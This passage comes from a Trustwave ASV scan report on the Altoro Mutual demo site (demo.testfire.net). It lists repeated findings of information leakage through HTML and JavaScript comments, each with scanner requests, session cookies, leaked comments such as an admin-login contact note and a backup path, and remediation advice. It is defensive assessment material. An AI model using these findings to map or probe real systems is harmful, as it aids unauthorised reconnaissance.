structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 367 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET http://demo.testfire.net:8080/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

90 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net:8080/


HTML or JavaScript Port: tcp/8080
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 368 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - http://demo.testfire.net:8080/index.jsp?content=personal.htm
GET - http://demo.testfire.net:8080/index.jsp?content=business.htm
GET - http://demo.testfire.net:8080/subscribe.jsp
POST - http://demo.testfire.net:8080/doSubscribe
GET - http://demo.testfire.net:8080/default.jsp?content=security.htm
GET - http://demo.testfire.net:8080/survey_questions.jsp
GET - http://demo.testfire.net:8080/survey_questions.jsp?step=a
GET - http://demo.testfire.net:8080/status_check.jsp
GET - http://demo.testfire.net:8080/swagger/index.html

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

91 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net/disclaimer.htm?url=http://www.micros


HTML or JavaScript oft.com
comments Port: tcp/80

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 369 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
http://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
http://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 370 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

92 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net:8443/disclaimer.htm?url=http://www.


HTML or JavaScript microsoft.com
comments Port: tcp/8443

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://demo.testfire.net:8443/disclaimer.htm?url=http://www.microsof
t.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
Request: GET
https://demo.testfire.net:8443/disclaimer.htm?url=http://www.microsof
t.com HTTP/1.1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 371 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

93 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117:8443/sendFeedback


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 372 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
DetectionDetails: HTML or Javascript comments found
POST - https://65.61.137.117:8443/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: POST https://65.61.137.117:8443/sendFeedback HTTP/1.1
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

94 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 373 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET
https://65.61.137.117:8443/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=9B8C68C14BB9B053BB189485F1F888A4
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 374 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

95 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net:8080/search.jsp?query=_WSETESTDAT


HTML or JavaScript A
comments Port: tcp/8080

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - http://demo.testfire.net:8080/search.jsp?query=_WSETESTDATA

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 375 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
Request: GET
http://demo.testfire.net:8080/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

96 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117/index.jsp?content=inside_contact.htm


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 376 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/index.jsp?content=inside_contact.htm
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, contact information,
subscriptions -->
Request: GET
https://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Remediation:
Remove comments which have sensitive information about the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 377 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

97 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117/login.jsp


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/login.jsp
Potentially sensitive comments found
"admin" found in
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->

7 HTML Comment(s) found

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 378 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- To get the latest admin login, please contact SiteOps at 415-555-
6159 -->
Request: GET https://65.61.137.117/login.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

98 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117/


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 379 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - https://65.61.137.117/index.jsp?content=personal.htm
GET - https://65.61.137.117/index.jsp?content=business.htm
GET - https://65.61.137.117/subscribe.jsp
POST - https://65.61.137.117/doSubscribe
GET - https://65.61.137.117/default.jsp?content=security.htm
GET - https://65.61.137.117/survey_questions.jsp
GET - https://65.61.137.117/survey_questions.jsp?step=a
GET - https://65.61.137.117/status_check.jsp
GET - https://65.61.137.117/swagger/index.html

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

99 Information leakage via 5.0 Medium Fail URL: http://demo.testfire.net/


HTML or JavaScript Port: tcp/80
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 380 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: Limit Exceeded. 9 more item(s) were reported.
GET - http://demo.testfire.net/index.jsp?content=personal.htm
GET - http://demo.testfire.net/index.jsp?content=business.htm
GET - http://demo.testfire.net/subscribe.jsp
POST - http://demo.testfire.net/doSubscribe
GET - http://demo.testfire.net/default.jsp?content=security.htm
GET - http://demo.testfire.net/survey_questions.jsp
GET - http://demo.testfire.net/survey_questions.jsp?step=a
GET - http://demo.testfire.net/status_check.jsp
GET - http://demo.testfire.net/swagger/index.html

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

URL: https://demo.testfire.net:8443/index.jsp

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 381 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

100 Information leakage via 5.0 Medium Fail Port: tcp/8443


HTML or JavaScript
comments While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://demo.testfire.net:8443/index.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://demo.testfire.net:8443/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 382 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

101 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117/disclaimer.htm?url=http://www.microsof


HTML or JavaScript t.com
comments Port: tcp/443

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 383 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://65.61.137.117/disclaimer.htm?url=http://www.microsoft.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
https://65.61.137.117/disclaimer.htm?url=http://www.microsoft.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

102 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117/feedback.jsp


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 384 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/feedback.jsp
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->
<!-- BEGIN FOOTER -->
<!-- Dave- Hard code this into the final script - Possible security
problem.
Re-generated every Tuesday and old files are saved
to .bak format at L:\backup\website\oldfiles --->
Request: GET https://65.61.137.117/feedback.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Remediation:
Remove comments which have sensitive information about the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 385 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

103 Information leakage via 5.0 Medium Fail URL: https://65.61.137.117/


HTML or JavaScript Port: tcp/443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET - https://65.61.137.117/
7 HTML Comment(s) found
<!-- BEGIN HEADER -->
<!-- END FOOTER -->
<!-- TOC BEGIN -->
<!-- END HEADER -->
<!-- TOC END -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 386 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- BEGIN FOOTER -->
<!-- Keywords:Altoro Mutual, online banking, banking, checking,
savings, accounts -->
Request: GET https://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

104 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net/disclaimer.htm?url=http://www.netsc


HTML or JavaScript ape.com
comments Port: tcp/443

While adding general comments is very useful, some programmers


tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 387 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
GET -
https://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
1 Javascript Comment(s) found
// if redirection is in the application's domain, don't ask for
authorization
Request: GET
https://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:
Remove comments which have sensitive information about the
application. Some of the comments may be exposed to the user and
affect the security posture of the application.

105 Information leakage via 5.0 Medium Fail URL: https://demo.testfire.net:8443/sendFeedback


HTML or JavaScript Port: tcp/8443
comments
While adding general comments is very useful, some programmers
tend to leave important data, such as: filenames related to the web
application, old links or links which were not meant to be browsed by

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 388 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
users, old code fragments, etc.

An attacker who finds these comments can map the application's


structure and files, expose hidden parts of the site, and study the
fragments of code to reverse engineer the application, which may help
develop further attacks against the site.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:N/A:N
Service: https

Reference:
https://cwe.mitre.org/data/definitions/615.html

Evidence:
DetectionDetails: HTML or Javascript comments found
POST - https://demo.testfire.net:8443/sendFeedback
6 HTML Comment(s) found
<!-- BEGIN HEADER -->
